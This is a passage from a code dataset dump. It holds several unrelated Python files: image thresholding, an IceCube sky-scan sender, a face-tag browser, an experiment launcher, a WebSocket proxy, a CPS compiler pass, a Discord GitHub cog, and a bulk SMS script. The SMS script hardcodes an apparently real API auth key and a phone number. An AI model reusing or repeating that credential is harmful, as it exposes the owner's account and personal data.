image.reshape((-1,1))\n\tZ = np.float32(Z)\n\tcriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0) #directly copied from opencv documentation\n\tret,label,center = cv2.kmeans(Z,kthresh,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS)\n\tif plotHistogram:\n\t\tkMeansHistogram(Z, label, kthresh)\n\tprint(center)\n\t# Now convert back into uint8, and make original image\n\tcenter = np.uint8(center)\n # Puts something into single array\n\tres = center[label.flatten()]\n # Takes 1-D array and puts back into image format\n\tkthreshed = res.reshape((image.shape))\n # Lowest grayscale k-means center: aka some color\n\tif(kthcenter == 0):\n\t\tthresh_val = min(center)[0]\n\telse:\n\t\tthresh_val = np.sort(np.concatenate(center))[kthcenter]\n\tprint(\"kmeans multithreshold value of \"+str(thresh_val)) \n\t#now threshold the k-means clustered image to only keep the darkest cluster\n\tret,proc = cv2.threshold(kthreshed,thresh_val,255,cv2.THRESH_BINARY) #binarizes\n # Binary image file\n\tprint(proc)\n # Threshold value\n\tprint(ret)\n\t#plt.imshow(proc,cmap = 'gray')\n\t#plt.show()\n\t#plt.imshow(img, cmap = 'gray')\n\t#plt.show()\n\t#canny(proc)\n\n\t\n\tdrawShapes(proc, img)\n\n\t\"\"\"\n\tprint(\"\\n Performing multithresholding...\")\n\tif data[\"kthresh\"] != 0:\n\t center1 = [] #darkest cluster\n\t center2 = [] #next darkest cluster\n\t total = 10\n\t for loc in img_locs[:total]:\n\t img = Image(loc)\n\t min_center = min(img.center)[0]\n\t min2_center = min(img.center[img.center != min(img.center)])\n\t #print(img.center)\n\t #print(min_center)\n\t #print(min2_center)\n\t \n\t center1.append(min_center)\n\t center2.append(min2_center)\n\t center1 = np.median(center1)\n\t center2 = np.median(center2)\n\t #thresh_val = (center1 + center2)/2\n\t thresh_val = center2\n\t #print(thresh_val)\n\t data[\"pixel_threshold\"] = thresh_val\n\t data[\"kthresh\"] = 0 \n\t with open('input.json','w') as f:\n\t json.dump(data,f,indent=4)\n\t print(\"final multithresholding value = %s \\n\" %(thresh_val)\n\t\"\"\"\n#histogram(img)\nmultiThresholding(img, 3)\n\n","sub_path":"auxiliary_functions/contourTesting.py","file_name":"contourTesting.py","file_ext":"py","file_size_in_byte":10171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"545465213","text":"#!/usr/bin/env python\n\nimport sys\nimport os\n\nfrom hil_calls import HILCLI\n\nimport SwitchCalls\n\nclass AuditClient(object):\t\n\n\tdef list_nodes(self, list_type):\n\t\tresponse = HILCLI().list_nodes(list_type)\n\t\treturn response\n\n\tdef list_projects(self):\n\t\tresponse = HILCLI().list_projects()\n\t\treturn response\n\n\tdef list_project_network(self, project):\n\t\tresponse = HILCLI().list_project_network(project)\n\t\treturn response\n\n\tdef show_network(self, network):\n\t\tresponse = HILCLI().show_network(network)\n\t\treturn response\n\n\tdef show_node(self,node_name):\n\t\tresponse = HILCLI().show_node(node_name)\n\t\treturn response\n\n\tdef get_node_info(self, node_name):\n\t\tresponse = {}\n\t\tnode_info = HILCLI().show_node(node_name)\n\t\tif (node_info[\"project\"] != None):\n\t\t\tresponse[\"project\"] = node_info[\"project\"]\n\t\t\tnetwork = self.list_project_network(response[\"project\"])\n\t\t\tresponse[\"network\"] = network\n\t\t\tvlan = []\n\t\t\tfor n in network:\n\t\t\t\tvlan.append(AuditClient().show_network(n)[\"channels\"])\n\t\t\tresponse[\"vlan\"] = vlan\n\t\telse:\n\t\t\tresponse[\"project\"] = \"\"\n\t\t\tresponse[\"network\"] = []\n\t\t\tresponse[\"vlan\"] = [[]]\n\t\treturn response\n\t\t\n# -------- SWITCH FUNCTIONS ------------\n\n\tdef list_switch_vlans(self, port):\n\t\tresponse = SwitchCalls.list_vlans(port)\n\t\treturn response\n\n\tdef list_switch_ports(self, vlan):\n\t\tresponse = SwitchCalls.list_ports(vlan)\n\t\treturn response\n","sub_path":"audit_rest/audit_rest/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"104974472","text":"from __future__ import print_function\nfrom __future__ import absolute_import\n\nimport numpy\nimport healpy\nimport os\nimport random\n\nimport tqdm\nimport time\n\nfrom icecube import icetray, dataclasses\nfrom icecube import gulliver, millipede\nfrom icecube import astro\nfrom icecube import VHESelfVeto\nfrom icecube import frame_object_diff\nfrom icecube.frame_object_diff.segments import uncompress\nfrom I3Tray import *\n\nimport config\n\nfrom utils import get_event_mjd, create_pixel_list\nfrom pulsar_icetray import PulsarClientService, SendPFrameWithMetadata\n\nclass SendPixelsToScan(icetray.I3Module):\n def __init__(self, ctx):\n super(SendPixelsToScan, self).__init__(ctx)\n self.AddParameter(\"FramePacket\", \"The GCDQp frame packet to send\", None)\n \n self.AddParameter(\"NSide\", \"The healpix resolution in terms of \\\"nside\\\".\", 8)\n\n self.AddParameter(\"AreaCenterNSide\", \"The healpix nside of the center pixel defined in \\\"AreaCenterPixel\\\".\", None)\n self.AddParameter(\"AreaCenterPixel\", \"The healpix pixel number where the area to be scanned is centered.\", None)\n self.AddParameter(\"AreaNumPixels\", \"The number of pixels in the area to be scanned (this is in terms of \\\"NSide\\\").\", None)\n\n self.AddParameter(\"PixelList\", \"A specific list of pixels to send.\", None)\n\n self.AddParameter(\"InputTimeName\", \"Name of an I3Double to use as the vertex time for the coarsest scan\", \"HESE_VHESelfVetoVertexTime\")\n self.AddParameter(\"InputPosName\", \"Name of an I3Position to use as the vertex position for the coarsest scan\", \"HESE_VHESelfVetoVertexPos\")\n self.AddParameter(\"OutputParticleName\", \"Name of the output I3Particle\", \"MillipedeSeedParticle\")\n self.AddParameter(\"InjectEventName\", \"Event name in each P-frame - for later sorting\", None)\n self.AddParameter(\"PosVariations\", \"An array of positional offsets to use for each pixel\", [dataclasses.I3Position(0.,0.,0.)])\n self.AddOutBox(\"OutBox\")\n\n def Configure(self):\n self.GCDQpFrames = self.GetParameter(\"FramePacket\")\n self.nside = self.GetParameter(\"NSide\")\n self.input_pos_name = self.GetParameter(\"InputPosName\")\n self.input_time_name = self.GetParameter(\"InputTimeName\")\n self.output_particle_name = self.GetParameter(\"OutputParticleName\")\n self.inject_event_name = self.GetParameter(\"InjectEventName\")\n self.posVariations = self.GetParameter(\"PosVariations\")\n \n self.area_center_nside = self.GetParameter(\"AreaCenterNSide\")\n self.area_center_pixel = self.GetParameter(\"AreaCenterPixel\")\n self.area_num_pixels = self.GetParameter(\"AreaNumPixels\")\n\n self.pixel_list_override = self.GetParameter(\"PixelList\")\n\n if (self.area_center_nside is not None or self.area_center_pixel is not None or self.area_num_pixels is not None) and \\\n (self.area_center_nside is None or self.area_center_pixel is None or self.area_num_pixels is None):\n raise RuntimeError(\"You have to either set none of the three options AreaCenterNSide,AreaCenterPixel,AreaNumPixels or all of them\")\n\n p_frame = self.GCDQpFrames[-1]\n if p_frame.Stop != icetray.I3Frame.Stream('p'):\n raise RuntimeError(\"Last frame of the GCDQp packet is not type 'p'.\")\n\n self.seed_position = p_frame[self.input_pos_name]\n self.seed_time = p_frame[self.input_time_name].value\n self.seed_energy = numpy.nan\n\n self.event_header = p_frame[\"I3EventHeader\"]\n self.event_mjd = get_event_mjd(self.GCDQpFrames)\n\n if self.pixel_list_override is not None:\n self.pixels_to_push = self.pixel_list_override\n print(\"Going to submit {} pixels (from a specific list: {})\".format(len(self.pixels_to_push), self.pixel_list_override))\n else:\n self.pixels_to_push = create_pixel_list(\n self.nside,\n area_center_nside=self.area_center_nside,\n area_center_pixel=self.area_center_pixel,\n area_num_pixels=self.area_num_pixels\n )\n \n print(\"Going to submit {} pixels\".format(len(self.pixels_to_push)))\n \n self.pixel_index = 0\n \n def Process(self):\n # driving module - we will be called repeatedly by IceTray with no input frames\n if self.PopFrame():\n raise RuntimeError(\"SendPixelsToScan needs to be used as a driving module\")\n\n # push GCDQp packet if not done so already\n if self.GCDQpFrames:\n for frame in self.GCDQpFrames:\n self.PushFrame(frame)\n self.GCDQpFrames = None\n print(\"Commencing full-sky scan...\")\n return\n\n # submit one more pixel\n if len(self.pixels_to_push) > 0:\n # get the first item from the list and remove it from the list\n next_pixel = self.pixels_to_push.pop(0)\n \n # create and push a P-frame to be processed\n self.CreatePFrame(nside=self.nside, pixel=next_pixel, pixel_index=self.pixel_index)\n self.pixel_index+=1\n else:\n # we are done.\n self.RequestSuspension()\n\n def CreatePFrame(self, nside, pixel, pixel_index):\n dec, ra = healpy.pix2ang(nside, pixel)\n dec = numpy.pi/2. - dec\n zenith, azimuth = astro.equa_to_dir(ra, dec, self.event_mjd)\n zenith = float(zenith)\n azimuth = float(azimuth)\n direction = dataclasses.I3Direction(zenith,azimuth)\n\n position = self.seed_position\n time = self.seed_time\n energy = self.seed_energy\n\n for i in range(0,len(self.posVariations)):\n posVariation = self.posVariations[i]\n p_frame = icetray.I3Frame(icetray.I3Frame.Physics)\n\n thisPosition = dataclasses.I3Position(position.x + posVariation.x, position.y + posVariation.y, position.z + posVariation.z)\n\n # generate the particle from scratch\n particle = dataclasses.I3Particle()\n particle.shape = dataclasses.I3Particle.ParticleShape.InfiniteTrack\n particle.fit_status = dataclasses.I3Particle.FitStatus.OK\n particle.pos = thisPosition\n particle.dir = direction\n particle.time = time\n particle.energy = energy\n p_frame[self.output_particle_name] = particle\n\n # generate a new event header\n eventHeader = dataclasses.I3EventHeader(self.event_header)\n eventHeader.sub_event_stream = \"SCAN_nside%04u_pixel%04u_posvar%04u\" % (nside, pixel, i)\n eventHeader.sub_event_id = pixel\n p_frame[\"I3EventHeader\"] = eventHeader\n p_frame[\"SCAN_HealpixPixel\"] = icetray.I3Int(int(pixel))\n p_frame[\"SCAN_HealpixNSide\"] = icetray.I3Int(int(nside))\n p_frame[\"SCAN_PositionVariationIndex\"] = icetray.I3Int(int(i))\n\n # an overall sequence index, 0-based, in case we need to re-start\n p_frame[\"SCAN_EventOverallIndex\"] = icetray.I3Int( int(i) + pixel_index*len(self.posVariations))\n if self.inject_event_name is not None:\n p_frame[\"SCAN_EventName\"] = dataclasses.I3String(self.inject_event_name)\n\n self.PushFrame(p_frame)\n\n\ndef send_scan(frame_packet, broker, auth_token, topic, metadata_topic_base, event_name, nside=1, area_center_nside=None, area_center_pixel=None, area_num_pixels=None, pixel_list=None):\n if (area_center_nside is not None or area_center_pixel is not None or area_num_pixels is not None) and \\\n (area_center_nside is None or area_center_pixel is None or area_num_pixels is None):\n raise RuntimeError(\"You have to either set none of the three options area_center_nside,area_center_pixel,area_num_pixels or all of them\")\n \n if pixel_list is not None:\n producer_name = None # do not use deduplication if we have a specific list of pixels\n elif area_center_nside is None:\n producer_name = \"skymap_to_scan_producer-\" + event_name + \"-nside\" + str(nside)\n else:\n producer_name = \"skymap_to_scan_producer-\" + event_name + \"-nside\" + str(nside) + \"-Cn\" + str(area_center_nside) + \"-p\" + str(area_center_pixel)\n \n print(\"producer_name is {}\".format(producer_name))\n \n # set up the positional variations (we use 7)\n variationDistance = 20.*I3Units.m\n posVariations = [\n dataclasses.I3Position(0.,0.,0.),\n dataclasses.I3Position(-variationDistance,0.,0.),\n dataclasses.I3Position( variationDistance,0.,0.),\n dataclasses.I3Position(0.,-variationDistance,0.),\n dataclasses.I3Position(0., variationDistance,0.),\n dataclasses.I3Position(0.,0.,-variationDistance),\n dataclasses.I3Position(0.,0., variationDistance)\n ]\n\n if area_num_pixels is None:\n num_pix = healpy.nside2npix(nside)\n else:\n num_pix = area_num_pixels\n num_it = num_pix*len(posVariations)\n pbar = tqdm.tqdm(\n total=num_it,\n desc = event_name,\n ascii = \" .oO0\",\n leave = True\n )\n\n # connect to pulsar\n client_service = PulsarClientService(\n BrokerURL=broker,\n AuthToken=auth_token\n )\n\n tray = I3Tray()\n \n # create P frames for a GCDQp packet\n tray.AddModule(SendPixelsToScan, \"SendPixelsToScan\",\n FramePacket=frame_packet,\n NSide=nside,\n InputTimeName=\"HESE_VHESelfVetoVertexTime\",\n InputPosName=\"HESE_VHESelfVetoVertexPos\",\n OutputParticleName=\"MillipedeSeedParticle\",\n InjectEventName=event_name,\n PosVariations=posVariations,\n AreaCenterNSide=area_center_nside,\n AreaCenterPixel=area_center_pixel,\n AreaNumPixels=area_num_pixels,\n PixelList=pixel_list\n )\n\n # sanity check\n def makeSurePulsesExist(frame, pulsesName):\n if pulsesName not in frame:\n print(frame)\n raise RuntimeError(\"{0} not in frame\".format(pulsesName))\n if pulsesName+\"TimeWindows\" not in frame:\n print(frame)\n raise RuntimeError(\"{0} not in frame\".format(pulsesName+\"TimeWindows\"))\n if pulsesName+\"TimeRange\" not in frame:\n print(frame)\n raise RuntimeError(\"{0} not in frame\".format(pulsesName+\"TimeRange\"))\n tray.AddModule(makeSurePulsesExist, \"makeSurePulsesExist\",\n pulsesName=\"SplitInIcePulsesLatePulseCleaned\")\n\n # now send all P-frames as pulsar messages\n tray.Add(SendPFrameWithMetadata, \"SendPFrameWithMetadata\",\n ClientService=client_service,\n Topic=topic,\n MetadataTopicBase=metadata_topic_base,\n ProducerName=producer_name,\n I3IntForSequenceID=\"SCAN_EventOverallIndex\",\n PartitionKey=lambda frame: frame[\"SCAN_EventName\"].value + '_' + str(frame[\"SCAN_HealpixNSide\"].value) + '_' + str(frame[\"SCAN_HealpixPixel\"].value)\n )\n \n def update_pbar(frame):\n pbar.set_postfix(pixel=\"{}/{}\".format(frame[\"SCAN_EventOverallIndex\"].value/len(posVariations)+1, num_pix), refresh=False)\n pbar.update(1)\n tray.Add(update_pbar, \"update_pbar\")\n \n tray.Execute()\n del tray\n\n pbar.close()\n\n del client_service\n","sub_path":"send_scan.py","file_name":"send_scan.py","file_ext":"py","file_size_in_byte":11200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"571059440","text":"import logging\nimport pickle\nimport argparse\n\nfrom tqdm import tqdm\n\nfrom visualization import visualize_faces, visualize_face_in_files\n\n\ndef make_face_to_file_dict(files_with_tags):\n faces_to_filetags_dict = {}\n for file_with_tag in files_with_tags:\n for tags in file_with_tag.get(\"faces\"):\n name = tags.get(\"name\")\n if name not in faces_to_filetags_dict:\n faces_to_filetags_dict[name] = []\n else:\n file_name = file_with_tag.get(\"file\")\n faces_to_filetags_dict[name].append({\"file\":file_with_tag.get(\"file\"), \"face\":tags})\n return faces_to_filetags_dict\n\n\ndef find_faces(search_name, files_with_tags):\n files_with_name = []\n for file_with_tag in files_with_tags:\n names_in_file = {}\n for tags in file_with_tag.get(\"faces\"):\n name = tags.get(\"name\")\n if search_name in name:\n file_name = file_with_tag.get(\"file\")\n files_with_name.append({\"name\":name, \"file\":file_with_tag.get(\"file\"), \"face\":tags})\n return files_with_name\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--pickle_file', help='Pickle file (acts as database)',\n default=\"files_with_tags.p\")\n parser.add_argument('--search_name', help='Name to search in database', default=\"\")\n parser.add_argument('--plot', help='Shall plot face tags?',\n default=\"no\")\n\n args = parser.parse_args()\n shall_plot = True if args.plot == \"yes\" else False\n\n logging.info(\"Loading pickle file...\")\n files_with_tags = pickle.load(open(args.pickle_file, \"rb\"))\n logging.info(\"Loadad {} file(s) with face tags\".format(len(files_with_tags)))\n\n search_name = args.search_name\n files_with_name = find_faces(search_name, files_with_tags)\n logging.info(\"Found {} face(s) for search '{}''\".format(len(files_with_name), search_name))\n\n faces_to_filetags_dict = make_face_to_file_dict(files_with_tags)\n logging.info(\"Found {} different face(s)\".format(len(faces_to_filetags_dict.keys())))\n for key, value in sorted(faces_to_filetags_dict.items(), key=lambda kv: len(kv[1]), reverse=True):\n print(\"{} appears in {} images\".format(key, len(value)))\n\n if shall_plot:\n visualize_faces(files_with_tags, False)\n visualize_face_in_files(files_with_name)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(filename='sample.log',level=logging.INFO)\n logging.getLogger().addHandler(logging.StreamHandler())\n main()\n","sub_path":"browse.py","file_name":"browse.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"568281290","text":"import os\nimport sys\nsys.path.append(str(os.getcwd()))\n\nfrom parametricSN.utils.helpers import experiments_cli, experiments_mpCommands\n\nmlflow_exp_name = os.path.basename(__file__)\nPROCESS_BATCH_SIZE = 1\n\nRUN_FILE = \"parametricSN/main.py\"\nPARAMS_FILE = \"parameters_texture.yml\"\nOPTIM = \"sgd\"\nLR = 0.001\nLRS = 0.1\nLRO = 0.7\nDF = 25\nEPOCHS = 150\nRUNS_PER_SEED = 4\nTOTALRUNS = 1\nSCHEDULER = \"OneCycleLR\"\nAUGMENT = \"original-cifar\"\nACCUM_STEP_MULTIPLE = 128\nTEST_BATCH_SIZE = 128\nTRAIN_BATCH_SIZE = 16\nSECOND_ORDER = 0\nMODEL = 'cnn'\nMODEL_WIDTH = 8\nSCATT_ARCH = 'identity'\nMODEL_LOSS = 'cross-entropy-accum'\n\n\nif __name__ == '__main__':\n PYTHON, DATA_ARG = experiments_cli()\n\n commands = []\n for SEED in [1390666426,432857963,1378328753,1118756524]:\n for sample in ['a', 'b', 'c', 'd']:\n args1 = \"-oname {} -olr {} -gseed {} -me {} -odivf {} -os {} -daug {} -en {} -pf {} -dsam {} {}\".format(\n OPTIM,LR,SEED,EPOCHS,DF,SCHEDULER,AUGMENT,mlflow_exp_name,PARAMS_FILE, sample, DATA_ARG\n )\n args2 = \"-mw {} -mloss {} -sa {} -dtstbs {} -dtbs {} -mname {} -dasm {}\".format(\n MODEL_WIDTH,MODEL_LOSS,SCATT_ARCH,TEST_BATCH_SIZE,TRAIN_BATCH_SIZE,MODEL,ACCUM_STEP_MULTIPLE)\n command = \"{} {} run-train {} {}\".format(\n PYTHON,RUN_FILE,args1,args2)\n commands.append(command)\n\n experiments_mpCommands(\n processBatchSize=PROCESS_BATCH_SIZE,\n commands=commands\n )\n\n ","sub_path":"experiments/kth/kth_sample_experiment_onlycnn.py","file_name":"kth_sample_experiment_onlycnn.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"305434084","text":"import os\ntry:\n import requests\nexcept ImportError:\n os.system('pip install requests')\n\nimport requests\nimport urllib\nimport csv\nimport time\n\nauth_key = '144872AoGnBaVgqLh59f59619'\nurl = 'http://sms.globehost.com/api/sendhttp.php?'\n\n\ndef send_message(contact):\n\n message = \"\"\"\n Warm up everyone! The wait for JCC is over. \n We are all set to begin it this evening at 5:45 PM in LG 11,12 and 13. \n Pull up your socks, pick up your pens, set your mind straight and put down your logic.\n May the best team win. \n Note : On spot Registrations are welcome. Please carry a pen with yourselves.\n\n Register at jcc.nitdgplug.org\n \"\"\"\n\n data = {\n 'authkey': auth_key,\n 'mobiles': contact,\n 'message': message,\n 'sender': 'GNULUG',\n 'route': '4',\n }\n\n data_encoded = urllib.urlencode(data)\n r = requests.get(url + data_encoded)\n print('Message Sent Successfully to ', contact, r.status_code)\n return r.status_code\n\n\n\n\"\"\"Array of contacts\"\"\"\ncontacts_array = [8436500886]\n\ncontacts_array.sort()\n\nvisited = 0\n\nnon_redundant_array = []\n\nfor contact in contacts_array:\n if visited != contact:\n non_redundant_array.append(contact)\n visited = contact\n\nprint(len(non_redundant_array))\n\nfor contact in non_redundant_array:\n send_message(contact)\n time.sleep(2)\n\n","sub_path":"send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"103579376","text":"from django.contrib import messages\r\nfrom django.shortcuts import render, redirect, get_object_or_404\r\nfrom django.urls import reverse\r\n\r\nfrom accounts.decorators import allowed_users\r\nfrom .forms import OrderCreateForm\r\nfrom .models import CommandeItem, Commande\r\nfrom cart.cart import Cart\r\nfrom django.contrib.admin.views.decorators import staff_member_required\r\nfrom django.conf import settings\r\nfrom django.http import HttpResponse\r\nfrom django.template.loader import render_to_string\r\n\r\n\"\"\"@allowed_users(allowed_roles=['customer'])\"\"\"\r\n\r\n\r\ndef order_create(request):\r\n cart = Cart(request)\r\n if request.method == 'POST':\r\n form = OrderCreateForm(request.POST)\r\n if form.is_valid():\r\n commande = form.save(commit=False)\r\n if cart.coupon:\r\n commande.coupon = cart.coupon\r\n commande.discount = cart.coupon.discount\r\n commande.save()\r\n for item in cart:\r\n CommandeItem.objects.create(\r\n commande=commande,\r\n produit=item['produit'],\r\n prix=item['prix'],\r\n quantity=item['quantity'])\r\n\r\n cart.clear()\r\n context = {\r\n 'commande': commande,\r\n }\r\n request.session['commande_id'] = commande.id\r\n\r\n return redirect(reverse('payment:process'))\r\n # return render(request, 'order/created.html', context)\r\n\r\n else:\r\n form = OrderCreateForm()\r\n context = {\r\n 'cart': cart,\r\n 'form': form\r\n }\r\n return render(request, 'checkout.html', context)\r\n\r\n\r\n\"\"\"\r\n@staff_member_required\r\ndef admin_order_pdf(request, order_id):\r\n Order = get_object_or_404(order, id=order_id)\r\n html = render_to_string('order/pdf.html', {'order': Order})\r\n response = HttpResponse(content_type='application/pdf')\r\n response['Content-Disposition'] = 'filename=\"order_{}.pdf\"'.format(Order.id)\r\n weasyprint.HTML(string=html).write_pdf(response, stylesheets=[weasyprint.CSS(settings.STATIC_ROOT + 'css/pdf.css')])\r\n return response\r\n\"\"\"\r\n","sub_path":"commandes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"648634496","text":"import time\nimport socket\nimport threading\nimport tornado.websocket\nimport tornado.httpserver\nimport tornado.ioloop\nfrom tools.xi_tornadothread import XiTornadoThread\n\n\nclass XiWebSocketProxyServer:\n\n wsClient = None\n tcpClient = None\n\n host = \"\"\n port = \"\"\n\n def __init__(self):\n\n self.server = None\n self.address = None\n\n XiWebSocketProxyServer.wsClient = None\n XiWebSocketProxyServer.tcpClient = None\n\n\n def start(self,host,port,certfile=None,keyfile=None):\n\n XiTornadoThread.start()\n\n XiWebSocketProxyServer.host = host\n XiWebSocketProxyServer.port = port\n\n sockets = tornado.netutil.bind_sockets( 0, 'localhost', socket.AF_INET )\n self.address = sockets[0].getsockname()\n self.app = tornado.web.Application( [ ( r'/mqtt' , XiWebSocketProxyWebSocket ) ] )\n\n if certfile == None :\n\n self.server = tornado.httpserver.HTTPServer( self.app )\n\n else:\n\n self.server = tornado.httpserver.HTTPServer( self.app , ssl_options = {\n \"certfile\": certfile,\n \"keyfile\": keyfile,\n })\n\n self.server.add_sockets( sockets )\n\n\n def _stop_impl(self):\n\n if XiWebSocketProxyServer.wsClient is not None:\n XiWebSocketProxyServer.wsClient.get_websocket_protocol()._abort()\n\n XiTornadoThread.stop()\n\n self.server.stop( )\n\n def stop(self):\n\n tornado.ioloop.IOLoop.instance().add_callback(callback=lambda: self._stop_impl())\n\n\nclass XiWebSocketProxyWebSocket(tornado.websocket.WebSocketHandler):\n\n\n def check_origin(self, origin):\n\n return True\n\n\n def open(self):\n\n XiWebSocketProxyServer.wsClient = self\n XiWebSocketProxyServer.tcpClient = XiWebSocketProxyTcpClient()\n XiWebSocketProxyServer.tcpClient.start( XiWebSocketProxyServer.host , XiWebSocketProxyServer.port )\n\n # hold server thread until connect until tcp client is ready to send/receive\n while XiWebSocketProxyServer.tcpClient.active == 0:\n pass\n\n\n def on_close(self):\n\n if XiWebSocketProxyServer.tcpClient is not None:\n\n XiWebSocketProxyServer.tcpClient.stop()\n XiWebSocketProxyServer.tcpClient = None\n XiWebSocketProxyServer.wsClient = None\n\n\n def on_message(self, message):\n\n if XiWebSocketProxyServer.tcpClient is not None:\n\n XiWebSocketProxyServer.tcpClient.socket.send( message )\n\n def _message_impl(self,message):\n self.write_message( message, True )\n\n def message(self,message):\n tornado.ioloop.IOLoop.instance().add_callback(callback=lambda: self._message_impl(message))\n\n\nclass XiWebSocketProxyTcpClient:\n\n\n def startrecv(self):\n\n self.active = 1\n while self.active == 1 :\n\n try:\n\n reply = self.socket.recv( 1024 )\n\n except Exception as e:\n\n reply = b\"\"\n\n # check end of file\n if reply != b\"\" :\n\n if XiWebSocketProxyServer.wsClient is not None:\n XiWebSocketProxyServer.wsClient.message(reply)\n\n else :\n\n self.active = 0\n\n self.closed = 1\n\n\n def start( self , host , port ):\n\n # connect socket\n\n try :\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM )\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR , 1 )\n self.socket.connect( ( host , port ) )\n self.closed = 0\n\n thread = threading.Thread( target = self.startrecv , args = [ ] )\n thread.start( )\n\n except Exception:\n self.active = 0\n self.closed = 1\n\n def stop(self):\n\n self.active = 0\n self.socket.close()\n\n","sub_path":"tests/tools/xi_websocketproxy.py","file_name":"xi_websocketproxy.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"152012072","text":"from collections import namedtuple\nfrom . import grammar\n\n\n__all__ = ['convert_to_cps']\n\n\nCall = namedtuple('Call', 'left, right, continue_label')\nConversion = namedtuple('Conversion', 'name, instructions')\nCondGoto = namedtuple('CondGoto', 'test, true_label, false_label')\nGoto = namedtuple('Goto', 'label, args')\nLabel = namedtuple('Label', 'name, params')\nTailCall = namedtuple('TailCall', 'left, right')\n\n\ndef convert_to_cps(program):\n writer = Writer()\n writer.write(program)\n return Conversion(writer.name, writer.instructions)\n\n\nclass Counter(object):\n def __init__(self, prefix):\n self.prefix = prefix\n self.count = 0\n\n def next(self):\n self.count += 1\n return '%s%s' % (self.prefix, self.count)\n\n\n_cases = []\ndef case(cls):\n def register(f):\n _cases.append((cls, f))\n return f\n return register\n\n\nclass Writer(object):\n def __init__(self):\n self.name = None\n self.funcs = Counter('^f')\n self.labels = Counter('@L')\n self.params = Counter('$r')\n self.values = Counter('%i')\n self.instructions = []\n self.append = self.instructions.append\n\n def define_value(self, value):\n self.name = self.values.next()\n self.append(grammar.Definition(self.name, value))\n\n def extend(self, *instructions):\n self.instructions.extend(instructions)\n\n def label(self, *params):\n cooked = [grammar.Parameter(i) for i in params]\n return Label(self.labels.next(), cooked)\n\n def write(self, node):\n for (cls, handler) in _cases:\n if isinstance(node, cls):\n handler(self, node)\n return self.name\n raise NotImplementedError\n\n\n@case(basestring)\ndef write_name(writer, name):\n writer.name = name\n\n\n@case(list)\ndef write_list(writer, items):\n for item in items:\n writer.write(item)\n\n\n@case((grammar.Collection, grammar.Record))\ndef write_collection(writer, node):\n elements = [writer.write(i) for i in node.elements]\n writer.define_value(node._replace(elements=elements))\n\n\n@case(grammar.Func)\ndef write_func(writer, func):\n name = writer.funcs.next() if func.name is None else func.name\n if func.body:\n conv = convert_to_cps(func.body)\n body = [Label('@Enter', [])] + conv.instructions\n if conv.name is not None:\n body.append(grammar.ReturnStmt(conv.name))\n else:\n body = [grammar.ReturnStmt(None)]\n writer.name = name\n writer.append(func._replace(name=name, body=body))\n\n\n@case(grammar.If)\ndef write_if(writer, node):\n writer.write(node.test)\n dst1 = writer.label()\n dst2 = writer.label()\n dst3 = writer.label(writer.params.next())\n writer.extend(CondGoto(writer.name, dst1.name, dst2.name), dst1)\n writer.write(node.true_case)\n writer.extend(Goto(dst3.name, [writer.name]), dst2)\n if node.false_case:\n writer.write(node.false_case)\n else:\n writer.name = '%nil'\n writer.extend(Goto(dst3.name, [writer.name]), dst3)\n writer.name = dst3.params[0].name\n\n\n@case(grammar.Operation)\ndef write_operation(writer, stmt):\n if stmt.operator == '':\n left = writer.write(stmt.left)\n right = writer.write(stmt.right)\n param = writer.params.next()\n dst = writer.label(param)\n writer.extend(Call(left, right, dst.name), dst)\n writer.name = param\n\n\n@case(grammar.ReturnStmt)\ndef write_return_stmt(writer, stmt):\n if isinstance(stmt.value, grammar.Operation) and stmt.value.operator == '':\n left = writer.write(stmt.value.left)\n right = writer.write(stmt.value.right)\n writer.append(TailCall(left, right))\n writer.name = None\n return\n\n if stmt.value is None:\n writer.name = None\n else:\n writer.write(stmt.value)\n writer.append(stmt._replace(value=writer.name))\n writer.name = None\n\n\n@case(grammar.Tokens.WholeNumber)\ndef write_whole_number(writer, num):\n writer.define_value(num)\n","sub_path":"stride/cps.py","file_name":"cps.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"235279923","text":"from pathlib import Path\n\nimport requests\nfrom git import Repo\nfrom redbot.core import checks\nfrom redbot.core.commands import commands, Context\n\nfrom .github_helper import GitHubHelper\n\n\nclass GitHub(commands.Cog):\n USER = 'bot'\n REPO_NAME = 'TestBot1'\n REPO_PATH = Path(f'/home/{USER}/.local/share/Red-DiscordBot/data/{REPO_NAME}/')\n TEST_REPO_DIR = REPO_PATH.joinpath('Test_Cogs')\n PARENT_REPO = Repo(str(REPO_PATH))\n\n @checks.admin_or_permissions()\n @commands.command()\n async def gitPull(self, ctx: Context):\n await ctx.send(self.PARENT_REPO.git.pull())\n\n @checks.admin_or_permissions()\n @commands.command()\n async def gitReset(self, ctx: Context):\n await ctx.send(self.PARENT_REPO.git.reset('HEAD', '--hard'))\n\n @commands.command()\n async def addToGitHubOrganization(self, ctx: Context, github_username):\n if not github_username:\n await ctx.send_help()\n driver = GitHubHelper.make_driver()\n try:\n GitHubHelper.is_valid_github_user(driver=driver, user=github_username)\n requests.post(url='http://10.147.19.43:41434/api/v1/github_invite', data={\"username\": github_username})\n await 